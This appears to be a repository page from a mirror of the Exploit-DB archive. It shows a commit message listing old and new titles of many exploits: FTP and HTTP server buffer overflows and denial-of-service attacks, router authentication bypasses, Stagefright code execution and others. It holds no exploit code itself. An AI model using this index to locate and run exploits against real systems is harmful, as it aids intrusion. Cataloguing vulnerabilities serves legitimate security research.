bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/multiple/dos/38779.py
Offensive Security f421077feb DB: 2016-09-28 
6 new exploits

UUCP Exploit - file creation/overwriting (symlinks)
UUCP Exploit - File Creation/Overwriting (symlinks) Exploit

Serv-U 3.x < 5.x - Privilege Escalation
Serv-U FTP Server 3.x < 5.x - Privilege Escalation

TiTan FTP Server - Long Command Heap Overflow (PoC)
Titan FTP Server - Long Command Heap Overflow (PoC)

Serv-U < 5.2 - Remote Denial of Service
Serv-U FTP Server < 5.2 - Remote Denial of Service

chesapeake tftp server 1.0 - Directory Traversal / Denial of Service (PoC)
Chesapeake TFTP Server 1.0 - Directory Traversal / Denial of Service (PoC)

Serv-U 4.x - 'site chmod' Remote Buffer Overflow
Serv-U FTP Server 4.x - 'site chmod' Remote Buffer Overflow

WS_FTP Server 5.03 - (RNFR) Buffer Overflow
Ipswitch WS_FTP Server 5.03 - (RNFR) Buffer Overflow

TYPSoft FTP Server 1.11 - (RETR) Denial of Service
TYPSoft FTP Server 1.11 - 'RETR' Denial of Service

XM Easy Personal FTP Server 1.0 - (Port) Remote Overflow (PoC)
XM Easy Personal FTP Server 1.0 - 'Port' Remote Overflow (PoC)

XM Easy Personal FTP Server 4.3 - (USER) Remote Buffer Overflow (PoC)
XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)

XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow (PoC)
XM Easy Personal FTP Server 5.0.1 - 'Port' Remote Overflow (PoC)

WinFtp Server 2.0.2 - (PASV) Remote Denial of Service
WinFTP Server 2.0.2 - (PASV) Remote Denial of Service

DREAM FTP Server 1.0.2 - (PORT) Remote Denial of Service
Dream FTP Server 1.0.2 - (PORT) Remote Denial of Service

XM Easy Personal FTP Server 5.2.1 - (USER) Format String Denial of Service
XM Easy Personal FTP Server 5.2.1 - 'USER' Format String Denial of Service

Sami HTTP Server 2.0.1 - (HTTP 404 Object not found) Denial of Service
Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service

TurboFTP 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service
TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service

XM Easy Personal FTP Server 5.30 - (ABOR) Format String Denial of Service
XM Easy Personal FTP Server 5.30 - 'ABOR' Format String Denial of Service

MiniWeb Http Server 0.8.x - Remote Denial of Service
MiniWeb HTTP Server 0.8.x - Remote Denial of Service

JAF-CMS 4.0 RC2 - Multiple Remote File Inclusion
JAF CMS 4.0 RC2 - Multiple Remote File Inclusion

XM Easy Personal FTP Server 5.4.0 - (XCWD) Denial of Service
XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Service

Belkin wireless G router + ADSL2 modem - Authentication Bypass
Belkin Wireless G router + ADSL2 modem - Authentication Bypass
Serv-U 7.3 - Authenticated (stou con:1) Denial of Service
Serv-U 7.3 - Authenticated Remote FTP File Replacement
Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service
Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement

WinFTP 2.3.0 - (PASV mode) Remote Denial of Service
WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service

Titan FTP server 6.26 build 630 - Remote Denial of Service
Titan FTP Server 6.26 build 630 - Remote Denial of Service

Netgear WG102 - Leaks SNMP write Password with read access
Netgear WG102 - Leaks SNMP Write Password With Read Access

WinFTP 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow
WinFTP Server 2.3.0 - 'LIST' Authenticated Remote Buffer Overflow

Netgear embedded Linux for the SSL312 router - Denial of Service
Netgear SSL312 Router - Denial of Service

Belkin BullDog Plus UPS-Service - Buffer Overflow
Belkin BullDog Plus - UPS-Service Buffer Overflow
Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit
Serv-U 7.4.0.1 - (SMNT) Authenticated Denial of Service
Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit
Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service

XM Easy Personal FTP Server 5.7.0 - (NLST) Denial of Service
XM Easy Personal FTP Server 5.7.0 - 'NLST' Denial of Service

TYPSoft FTP Server 1.11 - (ABORT) Remote Denial of Service
TYPSoft FTP Server 1.11 - 'ABORT' Remote Denial of Service

httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit
httpdx 0.8 FTP Server - Delete/Get/Create Directories/Files Exploit

Firebird SQL - op_connect_request main listener shutdown
Firebird SQL - op_connect_request main listener shutdown Exploit

HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service
BugHunter HTTP Server 1.6.2 - 'httpsv.exe' (GET 404) Remote Denial of Service

XM Easy Personal FTP Server - 'APPE' and 'DELE' Command Denial of Service
XM Easy Personal FTP Server - 'APPE' / 'DELE' Commands Denial of Service

TYPSoft 1.10 - APPE DELE Denial of Service
TYPSoft FTP Server 1.10 - APPE DELE Denial of Service

WingFTP Server 3.2.4 - Cross-Site Request Forgery
Wing FTP Server 3.2.4 - Cross-Site Request Forgery

Quick Player 1.2 -Unicode BoF - bindshell
Quick Player 1.2 - Unicode Buffer Overflow (Bindshell)

UplusFtp Server 1.7.0.12 - Remote Buffer Overflow
UplusFTP Server 1.7.0.12 - Remote Buffer Overflow

Wireshark 1.2.5 LWRES getaddrbyname BoF - calc.exe
Wireshark 1.2.5 - LWRES getaddrbyname Buffer Overflow (calc.exe)
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)
Easy~Ftp Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)

Easy~Ftp Server 1.7.0.2 - (HTTP) Remote Buffer Overflow
EasyFTP Server 1.7.0.2 - (HTTP) Remote Buffer Overflow

Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow
EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow

iPhone - FTP Server (WiFi FTP) by SavySoda Denial of Service/PoC
iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service/PoC

TopDownloads MP3 Player 1.0 - '.m3u' crash
TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit

Easy FTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)
EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)
eDisplay Personal FTP server 1.0.0 - Unauthenticated Denial of Service (PoC)
eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Crash SEH (PoC)
PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php
eDisplay Personal FTP Server 1.0.0 - Unauthenticated Denial of Service (PoC)
eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crash SEH (PoC)
PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php Exploit

eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)
eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)

uhttp Server - Directory Traversal
uhttp Server 0.1.0-alpha - Directory Traversal

eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)
eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)

Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow
EasyFTP Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow

Apple Safari 4.0.3 (Windows x86) - (Windows x86) CSS Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
SmallFTPd FTP Server 1.0.3 - DELE Command Denial of Service
TYPSoft FTP Server 1.10 - RETR Command Denial of Service
SmallFTPd 1.0.3 - DELE Command Denial of Service
TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service

SolarWinds 10.4.0.10 - TFTP Denial of Service
SolarWinds TFTP Server 10.4.0.10 - Denial of Service

e107 - Code Exec
e107 - Code Exection

HomeFTP Server r1.10.3 (build 144) - Denial of Service
Home FTP Server r1.10.3 (build 144) - Denial of Service

TYPSoft FTP Server 1.1 - Remote Denial of Service (APPE)
TYPSoft FTP Server 1.1 - 'APPE' Remote Denial of Service

SolarWinds 10.4.0.13 - Denial of Service
SolarWinds TFTP Server 10.4.0.13 - Denial of Service

ISC-DHCPD - Denial of Service
ISC DHCPD - Denial of Service
Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow
Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow

Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)
EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)

Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow
EasyFTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow

deepin tftp server 1.25 - Directory Traversal
Deepin TFTP Server 1.25 - Directory Traversal

Adobe Acrobat Reader and Flash Player - 'newclass' invalid pointer
Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit

JCMS 2010 - file download
JCMS 2010 - File Download Exploit

SolarFTP 2.0 - Multiple Commands Denial of Service
Solar FTP Server 2.0 - Multiple Commands Denial of Service

TYPSoft FTP Server 1.10 - RETR CMD Denial of Service
TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service

Xynph 1.0 - USER Denial of Service
Xynph FTP Server 1.0 - USER Denial of Service

XM Easy Personal FTP Server 5.8.0 - (TYPE) Denial of Service
XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service

Solar FTP 2.1 - Denial of Service
Solar FTP Server 2.1 - Denial of Service

Red Hat Linux - stickiness of /tmp
Red Hat Linux - stickiness of /tmp Exploit

home ftp server 1.12 - Directory Traversal
Home FTP Server 1.12 - Directory Traversal

NetGear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)
Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)

Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit)

RhinoSoft Serv-U - Session Cookie Buffer Overflow (Metasploit)
RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)

Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow
EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow

SmallFTPd 1.0.3 FTP Server - Denial of Service
SmallFTPd 1.0.3 - Denial of Service

PCMAN FTP Server Buffer Overflow - PUT Command (Metasploit)
PCMan FTP Server Buffer Overflow - PUT Command (Metasploit)

Solar FTP 2.1.1 - PASV Buffer Overflow (PoC)
Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)

BisonFTP Server 3.5 - Remote Buffer Overflow
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow

Solarftp 2.1.2 - PASV Buffer Overflow (Metasploit)
Solar FTP Server 2.1.2 - PASV Buffer Overflow (Metasploit)

BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)
BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)

NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery
Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery

zFTP Server - 'cwd/stat' Remote Denial of Service
zFTPServer - 'cwd/stat' Remote Denial of Service

Serv-U FTP - Jail Break
Serv-U FTP Server - Jail Break

Typsoft FTP Server 1.10 - Multiple Commands Denial of Service
TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service

PeerBlock 1.1 - BSOD
PeerBlock 1.1 - BSOD Exploit

distinct tftp server 3.01 - Directory Traversal
Distinct TFTP Server 3.01 - Directory Traversal

PHP < 5.3.12 & < 5.4.2 - CGI Argument Injection
PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection

Berkeley Sendmail 5.58 - DEBUG
Berkeley Sendmail 5.58 - Debug exploit
SunView (SunOS 4.1.1) - selection_svc
Digital Ultrix 4.0/4.1 - /usr/bin/chroot
SunOS 4.1.1 - /usr/release/bin/makeinstall
SunOS 4.1.1 - /usr/release/bin/winstall
SunView (SunOS 4.1.1) - selection_svc Exploit
Digital Ultrix 4.0/4.1 - /usr/bin/chroot Exploit
SunOS 4.1.1 - /usr/release/bin/makeinstall Exploit
SunOS 4.1.1 - /usr/release/bin/winstall Exploit

SunOS 4.1.3 - kmem setgid /etc/crash
SunOS 4.1.3 - kmem setgid /etc/crash Exploit

IRIX 6.4 - pfdisplay.cgi
IRIX 6.4 - 'pfdisplay.cgi' Exploit
SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE
SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT
SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE Exploit
SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT Exploit

FreePBX < 13.0.188 - Remote Command Execution (Metasploit)

HP JetAdmin 1.0.9 Rev. D - symlink
HP JetAdmin 1.0.9 Rev. D - symlink Exploit

Ipswitch IMail 5.0 / WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation
Ipswitch IMail 5.0 / Ipswitch WS_FTP Server 1.0.1/1.0.2 - Privilege Escalation

TP-Link Archer CR-700 - Cross-Site Scripting

BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin
BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin Exploit
Cat Soft Serv-U 2.5 - Buffer Overflow
BisonWare BisonWare FTP Server 3.5 - Multiple Vulnerabilities
Allaire ColdFusion Server 4.0.1 - CFCRYPT.EXE
Cat Soft Serv-U FTP Server 2.5 - Buffer Overflow
BisonWare BisohFTP Server 3.5 - Multiple Vulnerabilities
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Exploit

Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA
Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA Exploit

Linux Kernel 2.0 / 2.1 / 2.2 - autofs
Linux Kernel 2.0 / 2.1 / 2.2 - autofs Exploit
Debian 2.1 - httpd
S.u.S.E. 5.2 - gnuplot
Debian 2.1 - httpd Exploit
S.u.S.E. Linux 5.2 - gnuplot Exploit

Stanford University bootpd 2.4.3 / Debian 2.0 - netstd
Stanford University bootpd 2.4.3 / Debian 2.0 - netstd Exploit

SGI IRIX 6.2 - /usr/lib/netaddpr
SGI IRIX 6.2 - /usr/lib/netaddpr Exploit

SGI IRIX 6.2 - day5notifier
SGI IRIX 6.2 - day5notifier Exploit

SGI IRIX 6.4 - datman/cdman
SGI IRIX 6.4 - datman/cdman Exploit

RedHat Linux 2.1 - abuse.console
RedHat Linux 2.1 - abuse.console Exploit

SGI IRIX 6.3 - cgi-bin webdist.cgi
SGI IRIX 6.3 - cgi-bin webdist.cgi Exploit

SGI IRIX 6.4 - cgi-bin handler
SGI IRIX 6.4 - cgi-bin handler Exploit

SGI IRIX 6.4 - login
SGI IRIX 6.4 - login Exploit

IBM AIX 3.2.5 - IFS
IBM AIX 3.2.5 - IFS Exploit

IBM AIX 3.2.5 - login(1)
IBM AIX 3.2.5 - login(1) Exploit
Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (1)
Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)
Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS Exploit (1)
Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS Exploit (2)

Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP
Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP Exploit

GNU glibc 2.1/2.1.1 -6 - pt_chown
GNU glibc 2.1/2.1.1 -6 - pt_chown Exploit

Common Desktop Environment 2.1 20 / Solaris 7.0 - dtspcd
Common Desktop Environment 2.1 20 / Solaris 7.0 - dtspcd Exploit

ProFTPd 1.2 pre6 - snprintf
ProFTPd 1.2 pre6 - snprintf Exploit

Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi
Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi Exploit

Microsoft Internet Explorer 5.0/4.0.1 - IFRAME
Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit
UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1)
UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (2)
PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog
UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (1)
UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (2)
PHP/FI 1.0/FI 2.0/FI 2.0 b10 - mylog/mlog Exploit

S.u.S.E. Linux 6.1/6.2 - cwdtools
S.u.S.E. Linux 6.1/6.2 - cwdtools Exploit

SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin'
SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' Exploit

SCO Unixware 7.1 - 'pkg' commands
SCO Unixware 7.1 - 'pkg' command Exploit

Cat Soft Serv-U 2.5a - Server SITE PASS Denial of Service
Cat Soft Serv-U FTP Server 2.5a - SITE PASS Denial of Service

Nortel Networks Optivity NETarchitect 2.0 - PATH
Nortel Networks Optivity NETarchitect 2.0 - PATH Exploit

SGI IRIX 6.2 - midikeys/soundplayer
SGI IRIX 6.2 - midikeys/soundplayer Exploit

Allaire ColdFusion Server 4.0/4.0.1 - CFCACHE
Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Exploit

Cat Soft Serv-U 2.5/a/b / Windows 2000/95/98/NT 4.0 - Shortcut
Cat Soft Serv-U FTP Server 2.5/a/b (Windows 2000/95/98/NT 4.0) - Shortcut Exploit

Microsoft Windows 95/98/NT 4.0 - autorun.inf
Microsoft Windows 95/98/NT 4.0 - autorun.inf Exploit
Corel Linux OS 1.0 - buildxconfig
Corel Linux OS 1.0 - setxconf
Corel Linux OS 1.0 - buildxconfig Exploit
Corel Linux OS 1.0 - setxconf Exploit

TP Link Gateway 3.12.4 - Multiple Vulnerabilities
TP-Link Gateway 3.12.4 - Multiple Vulnerabilities

SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname
SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname Exploit

Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)
Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr Exploit (2)
Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel (1)
Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel (2)
Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - kreatecd
Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel  Exploit (1)
Halloween Linux 4.0 / RedHat Linux 6.1/6.2 - imwheel  Exploit (2)
Halloween Linux 4.0 / S.u.S.E. Linux 6.0/6.1/6.2/6.3 - kreatecd Exploit

Cisco IOS 11.x/12.x - HTTP %%
Cisco IOS 11.x/12.x - HTTP %% Exploit

RedHat Linux 6.0/6.1/6.2 - pam_console
RedHat Linux 6.0/6.1/6.2 - pam_console Exploit

HP-UX 10.20/11.0 man - /tmp symlink
HP-UX 10.20/11.0 man - /tmp Symlink Exploit

IRIX 5.3/6.x - mail
IRIX 5.3/6.x - mail Exploit

TYPSoft 0.7 x - FTP Server Remote Denial of Service
TYPSoft FTP Server 0.7.x - FTP Server Remote Denial of Service

Oracle Internet Directory 2.0.6 - oidldap
Oracle Internet Directory 2.0.6 - oidldap Exploit

CatSoft FTP Serv-U 2.5.x - Brute Force
Cat Soft Serv-U FTP Server 2.5.x - Brute Force

Small HTTP server 2.0 1 - Non-Existent File Denial of Service
Small HTTP Server 2.0 1 - Non-Existent File Denial of Service

NCSA httpd-campas 1.2 - sample script
NCSA httpd-campas 1.2 - sample script Exploit

Novell NetWare Web Server 2.x - convert.bas
Novell NetWare Web Server 2.x - convert.bas Exploit

Serv-U 2.4/2.5 - FTP Directory Traversal
Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal

Novell Netware Web Server 3.x - files.pl
Novell Netware Web Server 3.x - files.pl Exploit

guido frassetto sedum http server 2.0 - Directory Traversal
Guido Frassetto SEDUM HTTP Server 2.0 - Directory Traversal

robin twombly a1 http server 1.0 - Directory Traversal
Robin Twombly A1 HTTP Server 1.0 - Directory Traversal

SGI IRIX 3/4/5/6 / OpenLinux 1.0/1.1 - routed traceon
SGI IRIX 3/4/5/6 / OpenLinux 1.0/1.1 - routed traceon Exploit

michael lamont savant http server 2.1 - Directory Traversal
Michael Lamont Savant HTTP Server 2.1 - Directory Traversal
zeroo http server 1.5 - Directory Traversal (1)
zeroo http server 1.5 - Directory Traversal (2)
Zeroo HTTP Server 1.5 - Directory Traversal (1)
Zeroo HTTP Server 1.5 - Directory Traversal (2)

Netgear 1.x - ProSafe VPN Firewall Web Interface Login Denial of Service
Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service

Centrinity FirstClass 5.50/5.77/7.0/7.1 - HTTP Server Long Version Field Denial of Service
Centrinity FirstClass HTTP Server 5.50/5.77/7.0/7.1 - Long Version Field Denial of Service

Centrinity FirstClass 7.1 - HTTP Server Directory Disclosure
Centrinity FirstClass HTTP Server 7.1 -  Directory Disclosure

BRS Webweaver 1.0.7 - ISAPISkeleton.dll Cross-Site Scripting
BRS Webweaver 1.0.7 - 'ISAPISkeleton.dll' Cross-Site Scripting

XLight FTP Server 1.x - Long Directory Request Remote Denial of Service
Xlight FTP Server 1.x - Long Directory Request Remote Denial of Service

XLight FTP Server 1.52 - Remote Send File Request Denial of Service
Xlight FTP Server 1.52 - Remote Send File Request Denial of Service

gweb http server 0.5/0.6 - Directory Traversal
GWeb HTTP Server 0.5/0.6 - Directory Traversal

MiniWeb MiniWeb HTTP Server (build 300) - Crash (PoC)
MiniWeb HTTP Server (build 300) - Crash (PoC)

TP-Link Print Server TL PS110U - Sensitive Information Enumeration
TP-Link PS110U  Print Server TL - Sensitive Information Enumeration

PCMan's FTP Server 2.0.7 - Buffer Overflow
PCMan FTP Server 2.0.7 - Buffer Overflow

PCMan's FTP Server 2.0 - Remote Buffer Overflow
PCMan FTP Server 2.0 - Remote Buffer Overflow

PHP 3-5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass
PHP 3 < 5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass

PHP 3-5 - ZendEngine ECalloc Integer Overflow
PHP 3 < 5 - ZendEngine ECalloc Integer Overflow

NetGear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow
Netgear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow

NetGear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow
Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow
TPLINK WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities
Static Http Server 1.0 - Denial of Service
TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities
Static HTTP Server 1.0 - Denial of Service

NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)
Netgear ReadyNAS - Perl Code Evaluation (Metasploit)

NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting
Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting

NetGear DGN2200 N300 Wireless Router - Multiple Vulnerabilities
Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (1)
vsftpd FTP Server 2.0.5 - 'deny_file' Option Remote Denial of Service (2)
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)

Ipswitch 8.0 - WS_FTP Client Format String
Ipswitch WS_FTP Home/Professional 8.0 - WS_FTP Client Format String

NETGEAR WGR614 - Administration Interface Remote Denial of Service
Netgear WGR614 - Administration Interface Remote Denial of Service

Cisco IOS 12.4(23) HTTP Server - Multiple Cross-Site Scripting Vulnerabilities
Cisco IOS 12.4(23) - HTTP Server Multiple Cross-Site Scripting Vulnerabilities

NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities
Netgear N600 Wireless Dual Band WNDR3400 - Multiple Vulnerabilities

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting
Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure
Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure
TP-Link Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities
TP-Link Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities
TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities
TP-Link TL-WR841N / TL-WR841ND - Multiple Vulnerabilities

SolarFTP 2.1.1 - 'PASV' Command Remote Buffer Overflow
Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow

Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit
Netgear WNR500  Wireless Router - Parameter Traversal Arbitrary File Access Exploit

NetMan 204 - Backdoor Account

NetGear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities
Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities

Serv-U 11.1.0.3 - Denial of Service / Security Bypass
Serv-U FTP Server 11.1.0.3 - Denial of Service / Security Bypass

TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change
TP-Link TD-W8950ND ADSL2+ - Unauthenticated Remote DNS Change
NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure
ISC BIND9 - TKEY (PoC)
Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure
ISC BIND 9 - TKEY (PoC)

ISC BIND9 - TKEY Remote Denial of Service (PoC)
ISC BIND 9 - TKEY Remote Denial of Service (PoC)

NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation
Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation

Android (Stagefright) - Remote Code Execution
Android - 'Stagefright' Remote Code Execution

Microsoft Windows Media Center - MCL (MS15-100)
Microsoft Windows Media Center - MCL Exploit (MS15-100)

Android libstagefright - Integer Overflow Remote Code Execution
Android - libstagefright Integer Overflow Remote Code Execution

NETGEAR D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution
Netgear D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution

pdfium IsFlagSet (v8 memory management) - SIGSEGV
pdfium IsFlagSet (v8 memory management) - SIGSEGV Exploit

NETGEAR ProSafe Network Management System NMS300 - Multiple Vulnerabilities
Netgear ProSafe Network Management System NMS300 - Multiple Vulnerabilities

XM Easy Personal FTP Server 5.8 - (HELP) Remote Denial of Service
XM Easy Personal FTP Server 5.8.0 - 'HELP' Remote Denial of Service

NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)
Netgear ProSafe Network Management System 300 - Arbitrary File Upload (Metasploit)

TallSoft SNMP TFTP Server 1.0.0 - Denial of Service
TallSoft SNMP/TFTP Server 1.0.0 - Denial of Service

Metaphor - Stagefright Exploit with ASLR Bypass
Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass)

